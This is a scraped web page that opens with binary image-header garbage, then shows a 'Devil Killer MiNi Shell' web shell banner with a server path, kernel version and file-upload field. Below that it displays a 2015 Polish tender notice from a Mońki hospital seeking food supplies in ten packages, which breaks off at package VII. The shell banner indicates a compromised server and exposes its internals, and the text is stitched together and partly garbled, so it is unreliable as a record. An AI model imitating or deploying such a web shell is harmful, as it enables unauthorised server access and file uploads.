JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150416/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150416/87032-N-2015.html

<p class="kh_header"><b>Mońki: Przedmiotem zamówienia jest sukcesywna dostawa artykułów żywnościowych ujętych w pakietach I-X dla potrzeb Samodzielnego Publicznego Zakładu Opieki Zdrowotnej w Mońkach.</b><br>
<b>Numer ogłoszenia: 87032 - 2015; data zamieszczenia: 16.04.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej w Mońkach , al. Niepodległości 9, 19-100 Mońki, woj. podlaskie, tel. 85 727 81 30, 668 877 590, faks 85 727 81 35, 727 81 34.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.spzoz.monki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest sukcesywna dostawa artykułów żywnościowych ujętych w pakietach I-X dla potrzeb Samodzielnego Publicznego Zakładu Opieki Zdrowotnej w Mońkach..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest sukcesywna dostawa artykułów żywnościowych ujętych 
w pakietach I-X dla potrzeb Samodzielnego Publicznego Zakładu Opieki Zdrowotnej 
w Mońkach.
2.	Szczegółowy przedmiot zamówienia, o asortymencie i ilościach został określony w formularzu ofertowym stanowiącym załącznik nr 1 do specyfikacji istotnych warunków zamówienia, stanowiącą jej integralną część.
3.	Sukcesywne dostawy przedmiotu zamówienia będą realizowane jak następuje: 
a.	pakiet I - codziennie od poniedziałku do soboty w godz. 700-730,
b.	pakiet II - trzy razy w tygodniu,
c.	pakiet III - cztery razy w miesiącu,
d.	pakiet IV, pakiet VI, pakiet VII, pakiet VIII, pakiet X - jeden raz w tygodniu,
e.	pakiet V, pakiet IX - dwa razy w tygodniu.
Dopuszcza się zmianę wielkości opakowania z zachowaniem ogólnej ilości danego asortymentu podanej przez Zamawiającego. W takim przypadku wymagane ilości należy przeliczyć w taki sposób, aby ogólna ilość danego asortymentu była nie mniejsza niż podana w specyfikacji istotnych warunków zamówienia, a zaoferowana ilość opakowań była liczbą całkowitą (zaokrąglić w górę do pełnych opakowań), tj. należy przeliczyć wymaganą ilość wg wzoru: wymagana ilość opakowań x wymagana ilość sztuk w opakowaniu i następnie podzielić przez zmienioną ilość sztuk zawartą w oferowanym opakowaniu, zaokrąglając ilość opakowań w górę (do pełnego opakowania)..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.51.10.00-3, 03.22.11.12-4, 03.22.23.21-9, 15.11.00.00-2, 15.11.20.00-6, 15.13.11.30-5, 15.22.00.00-6, 15.51.20.00-0, 15.81.10.00-6, 15.81.11.00-7, 15.81.14.00-0, 15.83.10.00-2, 15.86.10.00-1, 03.14.25.00-3, 03.21.21.00-1, 15.33.22.90-3, 03.22.14.10-3, 03.22.12.30-7, 03.22.13.10-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 10.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli Wykonawca złoży wraz z ofertą oświadczenie
o spełnianiu warunków udziału w postępowaniu.
Ocena spełnienia warunków wymaganych od wykonawców zostanie dokonana wg. formuły spełnia - nie spełnia w oparciu o przedłożone przez Wykonawców dokumenty i oświadczenia wyszczególnione w Rozdziale XIV pkt. 1 przedmiotowej SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli Wykonawca złoży wraz z ofertą oświadczenie
o spełnianiu warunków udziału w postępowaniu.
Ocena spełnienia warunków wymaganych od wykonawców zostanie dokonana wg. formuły spełnia - nie spełnia w oparciu o przedłożone przez Wykonawców dokumenty i oświadczenia wyszczególnione w Rozdziale XIV pkt. 1 przedmiotowej SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli Wykonawca złoży wraz z ofertą oświadczenie
o spełnianiu warunków udziału w postępowaniu.
Ocena spełnienia warunków wymaganych od wykonawców zostanie dokonana wg. formuły spełnia - nie spełnia w oparciu o przedłożone przez Wykonawców dokumenty i oświadczenia wyszczególnione w Rozdziale XIV pkt. 1 przedmiotowej SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli Wykonawca złoży wraz z ofertą oświadczenie
o spełnianiu warunków udziału w postępowaniu.
Ocena spełnienia warunków wymaganych od wykonawców zostanie dokonana wg. formuły spełnia - nie spełnia w oparciu o przedłożone przez Wykonawców dokumenty i oświadczenia wyszczególnione w Rozdziale XIV pkt. 1 przedmiotowej SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli Wykonawca złoży wraz z ofertą oświadczenie
o spełnianiu warunków udziału w postępowaniu.
Ocena spełnienia warunków wymaganych od wykonawców zostanie dokonana wg. formuły spełnia - nie spełnia w oparciu o przedłożone przez Wykonawców dokumenty i oświadczenia wyszczególnione w Rozdziale XIV pkt. 1 przedmiotowej SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1. W celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym przez Zamawiającego (spełniają wymogi graniczne), należy przedłożyć inne dokumenty, tj.:
a) oświadczenie, że oferowane artykuły żywnościowe posiadają wymagane prawem dokumenty dopuszczające go do obrotu i spożycia, w szczególności spełniają wymagania określone przepisami ustawą z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (t.j. Dz. U. z 2010 r. Nr 136, poz. 914 z późn. zm.) oraz, że Wykonawca posiada zasady GHP/GMP/rozpoczął wdrażanie zasad  GHP/GMP oraz posiada system HACCP/rozpoczął wdrażanie systemu HACCP, złożone z wykorzystaniem formularza stanowiącego załącznik nr 5 do specyfikacji istotnych warunków zamówienia (jeżeli dotyczy).  Na każde żądanie Zamawiającego, na każdym etapie postępowania i w trakcie trwania umowy Wykonawca przedłoży wymagane dokumenty.
Zamawiający zastrzega sobie możliwość (w trakcie badania ofert, w określonym przez siebie terminie) żądania dodatkowo próbek asortymentowych do dokonania porównań zaoferowanego przez Wykonawcę przedmiotu zamówienia oraz innych oświadczeń lub dokumentów potwierdzających spełnianie warunków/parametrów granicznych określonych przez Zamawiającego w formularzu ofertowym stanowiącym załącznik nr 1 do specyfikacji istotnych warunków zamówienia.

Próbki będą dla Zamawiającego źródłem wiedzy o zgodności oferty Wykonawcy z wymaganiami zawartymi w specyfikacji istotnych warunków zamówienia. 
Dostarczone próbki będą wykorzystywane w toku badania i oceny ofert, w obowiązujących 
Zamawiającego procedurach, w celu sprawdzenia właściwości użytkowych.
Wykorzystanie próbek zostanie odnotowane m.in. odpowiednio w protokołach, notatkach, itp. 
Zużyte próbki stanowić będą odpad, który zostanie potraktowany zgodnie obowiązującą Zamawiającego zasadą gospodarki odpadami.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Upoważnienie (pełnomocnictwo) do podpisania oferty, o ile upoważnienie to nie wynika z innych dokumentów dołączonych do oferty.
2. Wypełniony i podpisany formularz ofertowy złożony z wykorzystaniem formularza stanowiącego załącznik nr 1 do specyfikacji istotnych warunków zamówienia, w tym w szczególności:
a.	oświadczenie, że dostawy stanowiące przedmiot zamówienia wykonywane będą sukcesywnie przez okres 12 miesięcy, złożony z wykorzystaniem formularza stanowiącego załącznik nr 1 do specyfikacji istotnych warunków zamówienia,
b.	oświadczenie o oferowanym terminie płatności, nie krótszym niż wymagany przez Zamawiającego minimum 60 dni licząc od daty otrzymania faktury za dostarczony przedmiot zamówienia, złożony z wykorzystaniem formularza stanowiącego załącznik nr 1 do specyfikacji istotnych warunków zamówienia,
c.	oświadczenie, że przy realizacji przedmiotu zamówienia Wykonawca zastosuje wszystkie obowiązujące przepisy w zakresie realizacji dostawy i opakowań zgodnie z wymogami prawa, złożony z wykorzystaniem formularza stanowiącego załącznik nr 1 do specyfikacji istotnych warunków zamówienia,
d.	oświadczenie o zapewnieniu stałości cen przez okres minimum 3 miesięcy od daty podpisania umowy za wyjątkiem pakietu III - Różne produkty żywnościowe, poz. 40 jaja kurze, pakietu IX - Świeże owoce i warzywa i pakietu X - Ziemniaki, w których należy uwzględniać sezonowość cen. W obowiązującym terminie stałości cen dopuszczalne będą jedynie zmiany cen oferowanej dostawy wynikające ze zmian stanu prawnego (zmiany stawek podatkowych, stawek celnych, wprowadzenia nowych podatków) - wprowadzone w odpowiedzi na uzasadniony pisemny wniosek, obowiązujące od dnia wejścia w życie odpowiedniego aktu prawnego oraz obniżki cen u producenta lub Wykonawcy. Po tym okresie ceny mogą ulec zmianie również w oparciu o wskaźnik cen towarów i usług konsumpcyjnych podanych przez GUS i ogłoszonych w Monitorze Polskim, po wcześniejszym udokumentowaniu i uzgodnieniu z Zamawiającym. Zmiana cen proponowana przez Wykonawcę nie może być wyższa od wskaźnika wzrostu cen konsumpcyjnych podanych przez GUS. Zmiana cen może dotyczyć wyłącznie dostaw cząstkowych, jeszcze nieprzyjętych przez Zamawiającego. Wykonawca zobowiązuje się do obniżki cen w przypadku obniżki cen konsumpcyjnych podanych przez GUS, złożony z wykorzystaniem formularza stanowiącego załącznik   nr 1 do specyfikacji istotnych warunków zamówienia.
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia formularz oferty podpisuje wyznaczony pełnomocnik.
3. W przypadku, gdy ofertę składają wykonawcy ubiegający się wspólnie o udzielenie zamówienia, wymagane jest załączenie dokumentu pełnomocnictwa określającego zakres umocowania pełnomocnika ustanowionego do reprezentowania ich w postępowaniu lub do reprezentowania ich w postępowaniu oraz zawarcia umowy w sprawie przedmiotowego zamówienia publicznego, w myśl art. 23 ustawy Prawo zamówień publicznych.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający przewiduje możliwość dokonania zmian umowy w zakresie:
1)	terminu(ów) zapłaty faktur(y) wystawionej(ych) Zamawiającemu przez Wykonawcę z tytułu realizacji umowy. Warunki dokonania zmian:
a) termin(y) płatności ulega(ją) zmianie na nowy(e) termin(y) ustalony(e) przez Strony,
b) termin(y) płatności może nastąpić wyłącznie z przyczyn leżących po stronie Zamawiającego.
2)	zmiany stawki podatku od towarów i usług,
3)	obniżki cen przez Wykonawcę lub producenta,
4)	zmiany przedstawicieli stron umowy,
5)	zmiany danych Zamawiającego lub Wykonawcy (np. zmiana oznaczenia firmy, adresu, siedziby), w szczególności przekształceń, przejęć,
6)	zmian, które są korzystne dla Zamawiającego,
7)	zmniejszenia ceny określonej w umowie, wydłużenia terminu płatności - w przypadku zaistnienia okoliczności wynikających z zasad funkcjonowania rynku takich jak np. zmniejszenie ceny producenckiej,
8)	braku objętego umową przedmiotu zamówienia, związanego z wycofaniem z obrotu lub całkowitego zaprzestania produkcji w czasie obowiązywania umowy, Zamawiający dopuszcza możliwość dostarczenia przedmiotów zamówienia równoważnych w cenach rynkowych lub w cenach będących następstwem dodatkowych negocjacji pomiędzy stronami,
9)	wydłużenie okresu trwania umowy - w przypadku niewyczerpania całości asortymentu określonego w formularzu ofertowym stanowiącym załącznik nr 1 do niniejszej specyfikacji istotnych warunków zamówienia,
10)	oświadczenie o zapewnieniu stałości cen przez okres minimum 3 miesięcy od daty podpisania umowy za wyjątkiem pakietu III - Różne produkty żywnościowe, poz. 40 jaja kurze, pakietu IX - Świeże owoce i warzywa i pakietu X - Ziemniaki, w których należy uwzględniać sezonowość cen. W obowiązującym terminie stałości cen dopuszczalne będą jedynie zmiany cen oferowanej dostawy wynikające ze zmian stanu prawnego (zmiany stawek podatkowych, stawek celnych, wprowadzenia nowych podatków) - wprowadzone w odpowiedzi na uzasadniony pisemny wniosek, obowiązujące od dnia wejścia w życie odpowiedniego aktu prawnego oraz obniżki cen u producenta lub Wykonawcy. Po tym okresie ceny mogą ulec zmianie również w oparciu o wskaźnik cen towarów i usług konsumpcyjnych podanych przez GUS i ogłoszonych w Monitorze Polskim, po wcześniejszym udokumentowaniu i uzgodnieniu z Zamawiającym. Zmiana cen proponowana przez Wykonawcę nie może być wyższa od wskaźnika wzrostu cen konsumpcyjnych podanych przez GUS. Zmiana cen może dotyczyć wyłącznie dostaw cząstkowych, jeszcze nieprzyjętych przez Zamawiającego. Wykonawca zobowiązuje się do obniżki cen w przypadku obniżki cen konsumpcyjnych podanych przez GUS.
2.  Wprowadzenie zmian, o których mowa w ust. 1 wymaga uzasadnienia konieczności zmian 
i porozumienia stron oraz sporządzenia w formie pisemnego aneksu do umowy, sporządzonego przez stronę umowy, która dokonuje jej zmiany, pod rygorem nieważności. 
3. Zamawiający zastrzega sobie prawo do zmiany limitów ilościowych zamawianego przedmiotu  zamówienia w stosunku do określonych w poszczególnych pozycjach objętych umową, zarówno in plus jak i in minus, bez zmiany wartości brutto, a Wykonawca oświadcza, że wyraża na to zgodę - w zakresie dotyczącym dostawy odczynników.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.spzoz.monki.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Sekcja Zamówień Publicznych Samodzielnego Publicznego Zakładu Opieki Zdrowotnej w Mońkach, Al. Niepodległości 9, I piętro, pokój nr 3..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.04.2015 godzina 10:00, miejsce: Sekretariat Samodzielnego Publicznego Zakładu Opieki Zdrowotnej w Mońkach, Al. Niepodległości 9, 19-100 Mońki..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> PAKIET I - PIECZYWO..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET I - PIECZYWO - 2 pozycje..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.10.00-6, 15.81.11.00-7, 15.81.14.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> PAKIET II - MLEKO, PRODUKTY MLECZNE I INNE ARTYKUŁY ŻYWNOŚCIOWE..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET II - MLEKO, PRODUKTY MLECZNE I INNE ARTYKUŁY ŻYWNOŚCIOWE - 11 pozycji..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.51.10.00-3, 15.51.20.00-0, 15.83.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> PAKIET III -RÓŻNE PRODUKTY ŻYWNOŚCIOWE..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET III - RÓŻNE PRODUKTY ŻYWNOŚCIOWE - 42 pozycji..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.83.10.00-2, 15.86.10.00-1, 03.14.25.00-3, 15.33.22.90-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> PAKIET IV - WARZYWA I OWOCE..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET IV - WARZYWA I OWOCE - 8 pozycji..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.15.80.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> PAKIET V - ŚWIEŻE MIĘSO..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET V - ŚWIEŻE MIĘSO - 9 pozycji..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> PAKIET VI - TŁUSZCZE I INNE WĘDLINY..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET VI - TŁUSZCZE I INNE WĘDLINY - 9 pozycji..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.11.30-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> PAKIET VII -RYBY I MROŻONKI..</p>
